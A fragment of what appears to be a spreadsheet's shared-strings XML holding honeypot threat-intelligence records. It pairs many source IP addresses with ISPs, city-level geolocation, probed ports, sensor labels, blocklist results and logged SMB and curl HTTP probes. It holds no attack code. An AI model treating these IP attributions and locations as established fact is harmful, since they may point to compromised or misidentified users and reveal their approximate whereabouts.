  </si>
  <si>
    <t>::ffff:3bb1:6f81</t>
  </si>
  <si>
    <t>34f14272852fc9bb7f9695ffcddb94d3</t>
  </si>
  <si>
    <t>196.190.69.202</t>
  </si>
  <si>
    <t>::ffff:c4be:45ca</t>
  </si>
  <si>
    <t>f1ff633874a57f26cc7c525e2da4bfee</t>
  </si>
  <si>
    <t>117.198.134.181</t>
  </si>
  <si>
    <t>BSNL BBoWIFI services</t>
  </si>
  <si>
    <t>BBoWIFI</t>
  </si>
  <si>
    <t>::ffff:75c6:86b5</t>
  </si>
  <si>
    <t>4efb8b863b36e06dde4e5a2f7cedd967</t>
  </si>
  <si>
    <t>117.203.229.121</t>
  </si>
  <si>
    <t>::ffff:75cb:e579</t>
  </si>
  <si>
    <t>dbe46ace78af9923aaef3c5e228e174a</t>
  </si>
  <si>
    <t>27.5.26.151</t>
  </si>
  <si>
    <t>HATHWAY-AP</t>
  </si>
  <si>
    <t>::ffff:1b05:1a97</t>
  </si>
  <si>
    <t>7974a251b74cd7bfb01303791a98b03f</t>
  </si>
  <si>
    <t>59.91.244.5</t>
  </si>
  <si>
    <t>::ffff:3b5b:f405</t>
  </si>
  <si>
    <t>8488e423498c0f863106509cdcf408b5</t>
  </si>
  <si>
    <t>117.214.8.10</t>
  </si>
  <si>
    <t>Darjeeling</t>
  </si>
  <si>
    <t>Siliguri</t>
  </si>
  <si>
    <t>1256525</t>
  </si>
  <si>
    <t>734001</t>
  </si>
  <si>
    <t>26.7271</t>
  </si>
  <si>
    <t>88.3953</t>
  </si>
  <si>
    <t>::ffff:75d6:80a</t>
  </si>
  <si>
    <t>8bc706f93b387c66ac7ae853037dfa25</t>
  </si>
  <si>
    <t>186.118.121.223</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;52706&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:ba76:79df</t>
  </si>
  <si>
    <t>412d4256947519e5842fdaf5c7b4ad4c</t>
  </si>
  <si>
    <t>27.6.242.234</t>
  </si>
  <si>
    <t>::ffff:1b06:f2ea</t>
  </si>
  <si>
    <t>69f4da200215957cc3b62993cb2624ba</t>
  </si>
  <si>
    <t>117.248.163.218</t>
  </si>
  <si>
    <t>::ffff:75f8:a3da</t>
  </si>
  <si>
    <t>b291e2424202724acc584f9cc139f382</t>
  </si>
  <si>
    <t>117.217.41.20</t>
  </si>
  <si>
    <t>::ffff:75d9:2914</t>
  </si>
  <si>
    <t>cb87b7fe0e53f6298c25e30fc5592fc0</t>
  </si>
  <si>
    <t>117.255.31.181</t>
  </si>
  <si>
    <t>::ffff:75ff:1fb5</t>
  </si>
  <si>
    <t>e51bb19b741b5b67ec9c10764858ec95</t>
  </si>
  <si>
    <t>117.205.152.111</t>
  </si>
  <si>
    <t>::ffff:75cd:986f</t>
  </si>
  <si>
    <t>99c89055ab18345400c0013f37a29012</t>
  </si>
  <si>
    <t>175.213.213.26</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:afd5:d51a</t>
  </si>
  <si>
    <t>23d918a004c440229d88ab8e9ccd1349</t>
  </si>
  <si>
    <t>117.241.209.240</t>
  </si>
  <si>
    <t>::ffff:75f1:d1f0</t>
  </si>
  <si>
    <t>8d86dea61e8fbe7ab879cb804fe77052</t>
  </si>
  <si>
    <t>112.196.62.7</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>1433&amp;&amp;23&amp;&amp;3306</t>
  </si>
  <si>
    <t>::ffff:70c4:3e07</t>
  </si>
  <si>
    <t>799e90a096b60d3d795efc5c1588cd1b</t>
  </si>
  <si>
    <t>27.5.41.227</t>
  </si>
  <si>
    <t>::ffff:1b05:29e3</t>
  </si>
  <si>
    <t>1c2b1af13cc17fd7a98b695d322a047a</t>
  </si>
  <si>
    <t>112.196.43.146</t>
  </si>
  <si>
    <t>::ffff:70c4:2b92</t>
  </si>
  <si>
    <t>3ef68892111447913e1d96e6437acaab</t>
  </si>
  <si>
    <t>202.166.217.205</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_SMB_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;1080&amp;&amp;443&amp;&amp;389&amp;&amp;445&amp;&amp;51389&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>27.7017</t>
  </si>
  <si>
    <t>85.3206</t>
  </si>
  <si>
    <t>WLINK_FIBER_STATIC_IP_SUBNET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.217.205,60457)}&amp;&amp;{Data_SMB:Incoming connection (202.166.217.205,60700)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:caa6:d9cd</t>
  </si>
  <si>
    <t>191518368cac6e50fd24cb6b7cd85a2d</t>
  </si>
  <si>
    <t>61.0.108.75</t>
  </si>
  <si>
    <t>::ffff:3d00:6c4b</t>
  </si>
  <si>
    <t>34ac2f029fefda6d77f68b1c34466307</t>
  </si>
  <si>
    <t>61.2.156.104</t>
  </si>
  <si>
    <t>::ffff:3d02:9c68</t>
  </si>
  <si>
    <t>d411280e58e1ae18522496820e712c54</t>
  </si>
  <si>
    <t>181.230.170.134</t>
  </si>
  <si>
    <t>::ffff:b5e6:aa86</t>
  </si>
  <si>
    <t>ab33ac6284073f621e8bbab212fb1e20</t>
  </si>
  <si>
    <t>103.240.32.228</t>
  </si>
  <si>
    <t>Bopal</t>
  </si>
  <si>
    <t>13157139</t>
  </si>
  <si>
    <t>72.4672</t>
  </si>
  <si>
    <t>132923</t>
  </si>
  <si>
    <t>Vihaan Telecommunication Pvt. Ltd.</t>
  </si>
  <si>
    <t>Vihaan</t>
  </si>
  <si>
    <t>::ffff:67f0:20e4</t>
  </si>
  <si>
    <t>94b6690675f11da5efe6b6bce7f02a8c</t>
  </si>
  <si>
    <t>103.251.53.73</t>
  </si>
  <si>
    <t>::ffff:67fb:3549</t>
  </si>
  <si>
    <t>750c7318870958ccc1a712d2b02b1902</t>
  </si>
  <si>
    <t>49.47.197.117</t>
  </si>
  <si>
    <t>Kozhikode</t>
  </si>
  <si>
    <t>1265873</t>
  </si>
  <si>
    <t>11.248</t>
  </si>
  <si>
    <t>75.7804</t>
  </si>
  <si>
    <t>::ffff:312f:c575</t>
  </si>
  <si>
    <t>dc467d5180ace2290af5a4af7fe06b9e</t>
  </si>
  <si>
    <t>103.211.133.204</t>
  </si>
  <si>
    <t>::ffff:67d3:85cc</t>
  </si>
  <si>
    <t>da5b6709d32b77a36dea91b14d6cf16e</t>
  </si>
  <si>
    <t>117.212.49.24</t>
  </si>
  <si>
    <t>::ffff:75d4:3118</t>
  </si>
  <si>
    <t>b0c1774b05e2a34c59d1ec432536cb0b</t>
  </si>
  <si>
    <t>59.96.184.230</t>
  </si>
  <si>
    <t>::ffff:3b60:b8e6</t>
  </si>
  <si>
    <t>8c25d1a2741ea3f159b72e511503454d</t>
  </si>
  <si>
    <t>222.252.148.135</t>
  </si>
  <si>
    <t>56</t>
  </si>
  <si>
    <t>Bắc Ninh Province</t>
  </si>
  <si>
    <t>Thành Phố Bắc Ninh</t>
  </si>
  <si>
    <t>Bắc Ninh</t>
  </si>
  <si>
    <t>1591449</t>
  </si>
  <si>
    <t>21.1861</t>
  </si>
  <si>
    <t>106.076</t>
  </si>
  <si>
    <t>2004-05-18</t>
  </si>
  <si>
    <t>vtn-net</t>
  </si>
  <si>
    <t>::ffff:defc:9487</t>
  </si>
  <si>
    <t>e518b16daaefa188c5413e5a10405d51</t>
  </si>
  <si>
    <t>103.153.193.206</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H23</t>
  </si>
  <si>
    <t>0.920995</t>
  </si>
  <si>
    <t>104.514</t>
  </si>
  <si>
    <t>140472</t>
  </si>
  <si>
    <t>PT Dinamika Karya Adicita</t>
  </si>
  <si>
    <t>DIKA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,61980)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,62409)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,60617)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,60996)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,58115)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,58494)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6799:c1ce</t>
  </si>
  <si>
    <t>289d535cb53c131a55dfa4fb11d8932f</t>
  </si>
  <si>
    <t>109.162.58.81</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;12581&amp;&amp;34553&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6da2:3a51</t>
  </si>
  <si>
    <t>1eb14a219e56a9315d99ead07c602f41</t>
  </si>
  <si>
    <t>49.43.218.234</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43</t>
  </si>
  <si>
    <t>3306&amp;&amp;1433&amp;&amp;52068</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:312b:daea</t>
  </si>
  <si>
    <t>6e8fc7a1d06070ee56a159cd87e8e383</t>
  </si>
  <si>
    <t>117.242.235.240</t>
  </si>
  <si>
    <t>{'spamsources.fabel.dk': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:75f2:ebf0</t>
  </si>
  <si>
    <t>518ca83b20233771b662a31a2868675f</t>
  </si>
  <si>
    <t>46.118.238.233</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>63</t>
  </si>
  <si>
    <t>Kharkivs’ka Oblast’</t>
  </si>
  <si>
    <t>Kharkiv Raion</t>
  </si>
  <si>
    <t>Kharkiv</t>
  </si>
  <si>
    <t>706483</t>
  </si>
  <si>
    <t>50.002</t>
  </si>
  <si>
    <t>36.3074</t>
  </si>
  <si>
    <t>::ffff:2e76:eee9</t>
  </si>
  <si>
    <t>5bad55d1db69b4339fa113cb0f740652</t>
  </si>
  <si>
    <t>103.97.96.25</t>
  </si>
  <si>
    <t>Mumbai (Azad Nagar)</t>
  </si>
  <si>
    <t>400053</t>
  </si>
  <si>
    <t>19.0355</t>
  </si>
  <si>
    <t>72.9454</t>
  </si>
  <si>
    <t>134937</t>
  </si>
  <si>
    <t>Speed Communication</t>
  </si>
  <si>
    <t>Sukain Infoway Pvt Ltd</t>
  </si>
  <si>
    <t>Sukain Infoway Private Limited</t>
  </si>
  <si>
    <t>2017-07-18</t>
  </si>
  <si>
    <t>SUKAIN</t>
  </si>
  <si>
    <t>::ffff:6761:6019</t>
  </si>
  <si>
    <t>ca3db3811c2e5c868ff72face0cb9e5e</t>
  </si>
  <si>
    <t>117.194.220.10</t>
  </si>
  <si>
    <t>::ffff:75c2:dc0a</t>
  </si>
  <si>
    <t>7c5f0f7b26bf5afe6eced5546140d314</t>
  </si>
  <si>
    <t>59.89.97.240</t>
  </si>
  <si>
    <t>::ffff:3b59:61f0</t>
  </si>
  <si>
    <t>0134c8b8396df591e5b306c56caddc3f</t>
  </si>
  <si>
    <t>68.43.167.79</t>
  </si>
  <si>
    <t>NA&amp;&amp;c-68-43-167-79.hsd1.mi.comcast.net</t>
  </si>
  <si>
    <t>Lenawee</t>
  </si>
  <si>
    <t>Clinton</t>
  </si>
  <si>
    <t>4989132</t>
  </si>
  <si>
    <t>49236</t>
  </si>
  <si>
    <t>42.072</t>
  </si>
  <si>
    <t>-83.9716</t>
  </si>
  <si>
    <t>2001-11-29</t>
  </si>
  <si>
    <t>JUMPSTART-1</t>
  </si>
  <si>
    <t>::ffff:442b:a74f</t>
  </si>
  <si>
    <t>ca2de733ef96d682d6663ca0d12a9da0</t>
  </si>
  <si>
    <t>45.249.171.98</t>
  </si>
  <si>
    <t>Wayanad</t>
  </si>
  <si>
    <t>Kalpatta</t>
  </si>
  <si>
    <t>1268327</t>
  </si>
  <si>
    <t>11.6087</t>
  </si>
  <si>
    <t>76.0834</t>
  </si>
  <si>
    <t>E and U Technology Services LLP</t>
  </si>
  <si>
    <t>2016-05-12</t>
  </si>
  <si>
    <t>EANDU</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,62204)}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,62816)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,65289)}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,429)}</t>
  </si>
  <si>
    <t>::ffff:2df9:ab62</t>
  </si>
  <si>
    <t>9bf75a0313c8716e0be2a5d72ca51373</t>
  </si>
  <si>
    <t>14.139.187.209</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam']}</t>
  </si>
  <si>
    <t>Avadi</t>
  </si>
  <si>
    <t>1278130</t>
  </si>
  <si>
    <t>600054</t>
  </si>
  <si>
    <t>13.1067</t>
  </si>
  <si>
    <t>80.097</t>
  </si>
  <si>
    <t>NKN-CORE-NW</t>
  </si>
  <si>
    <t>St.peters University</t>
  </si>
  <si>
    <t>::ffff:e8b:bbd1</t>
  </si>
  <si>
    <t>db29f66f8135b2117bfc748d4ff830d2</t>
  </si>
  <si>
    <t>102.210.149.127</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H46</t>
  </si>
  <si>
    <t>KE</t>
  </si>
  <si>
    <t>Kenya</t>
  </si>
  <si>
    <t>Nairobi County</t>
  </si>
  <si>
    <t>Nairobi</t>
  </si>
  <si>
    <t>184745</t>
  </si>
  <si>
    <t>00100</t>
  </si>
  <si>
    <t>-1.29207</t>
  </si>
  <si>
    <t>36.8219</t>
  </si>
  <si>
    <t>328847</t>
  </si>
  <si>
    <t>THE KONZA TECHNOPOLIS DEVELOPMENT AUTHORITY</t>
  </si>
  <si>
    <t>NewIP 2ND</t>
  </si>
  <si>
    <t>2023-11-15</t>
  </si>
  <si>
    <t>::ffff:66d2:957f</t>
  </si>
  <si>
    <t>0332fdca3ee5685deafffcf926789365</t>
  </si>
  <si>
    <t>117.214.139.155</t>
  </si>
  <si>
    <t>::ffff:75d6:8b9b</t>
  </si>
  <si>
    <t>1cb280cdbc5b11a1534de403a246643b</t>
  </si>
  <si>
    <t>59.92.169.212</t>
  </si>
  <si>
    <t>::ffff:3b5c:a9d4</t>
  </si>
  <si>
    <t>19933175955489b3d2892856a65decd4</t>
  </si>
  <si>
    <t>37.115.82.237</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;2419&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2573:52ed</t>
  </si>
  <si>
    <t>31cf0e607a4759e282ef1af5de2f162f</t>
  </si>
  <si>
    <t>178.137.145.172</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_NTP_H30&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1080&amp;&amp;123&amp;&amp;5432&amp;&amp;445&amp;&amp;443&amp;&amp;25&amp;&amp;9100&amp;&amp;6667&amp;&amp;45694&amp;&amp;45333&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b289:91ac</t>
  </si>
  <si>
    <t>f7a1bd0ef2c59a1ec4e2b7e5e0c028de</t>
  </si>
  <si>
    <t>37.115.66.16</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55930&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2573:4210</t>
  </si>
  <si>
    <t>2b61e1be6fd7a7e60667353e8423cbb9</t>
  </si>
  <si>
    <t>1.23.115.16</t>
  </si>
  <si>
    <t>Tikona Digital Networks Pvt. Ltd</t>
  </si>
  <si>
    <t>::ffff:117:7310</t>
  </si>
  <si>
    <t>f3eb45ad202c2ff2015a6d8ac02d10ac</t>
  </si>
  <si>
    <t>120.61.254.202</t>
  </si>
  <si>
    <t>::ffff:783d:feca</t>
  </si>
  <si>
    <t>da4d896bad88f307843d1db15752c3a5</t>
  </si>
  <si>
    <t>59.180.191.145</t>
  </si>
  <si>
    <t>::ffff:3bb4:bf91</t>
  </si>
  <si>
    <t>c8cde87f145d531d9283cd630cba82a8</t>
  </si>
  <si>
    <t>117.232.62.77</t>
  </si>
  <si>
    <t>::ffff:75e8:3e4d</t>
  </si>
  <si>
    <t>fc64312b039c7c4752710d7c8bd32981</t>
  </si>
  <si>
    <t>36.236.17.113</t>
  </si>
  <si>
    <t>NA&amp;&amp;36-236-17-113.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;60727&amp;&amp;62422</t>
  </si>
  <si>
    <t>::ffff:24ec:1171</t>
  </si>
  <si>
    <t>e91409d6639253f7875c53deb310b7be</t>
  </si>
  <si>
    <t>46.119.138.236</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_PJL_H42&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;5900&amp;&amp;9100&amp;&amp;445&amp;&amp;80&amp;&amp;63058&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:8aec</t>
  </si>
  <si>
    <t>1bb253e4093f231eb184f3dc07a94607</t>
  </si>
  <si>
    <t>220.130.157.62</t>
  </si>
  <si>
    <t>220-130-157-62.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTP_H38&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;40634&amp;&amp;23&amp;&amp;NA&amp;&amp;35094&amp;&amp;35138</t>
  </si>
  <si>
    <t>New Taipei City</t>
  </si>
  <si>
    <t>12908892</t>
  </si>
  <si>
    <t>25.062</t>
  </si>
  <si>
    <t>121.457</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc82:9d3e</t>
  </si>
  <si>
    <t>4f1f86772e65d80cf3d9bf42f5c8d2cb</t>
  </si>
  <si>
    <t>59.126.160.245</t>
  </si>
  <si>
    <t>59-126-160-245.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5254&amp;&amp;23&amp;&amp;34395&amp;&amp;34786&amp;&amp;NA&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:3b7e:a0f5</t>
  </si>
  <si>
    <t>81cbf6f2b1edfbbaaafc6293d795fe61</t>
  </si>
  <si>
    <t>37.115.66.248</t>
  </si>
  <si>
    <t>::ffff:2573:42f8</t>
  </si>
  <si>
    <t>a8898465f8716b4a39a04f81903599d3</t>
  </si>
  <si>
    <t>121.175.44.119</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;23&amp;&amp;50204&amp;&amp;50448&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:79af:2c77</t>
  </si>
  <si>
    <t>37973648acade6fd39ab68dd441e3f5f</t>
  </si>
  <si>
    <t>220.134.152.47</t>
  </si>
  <si>
    <t>220-134-152-47.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
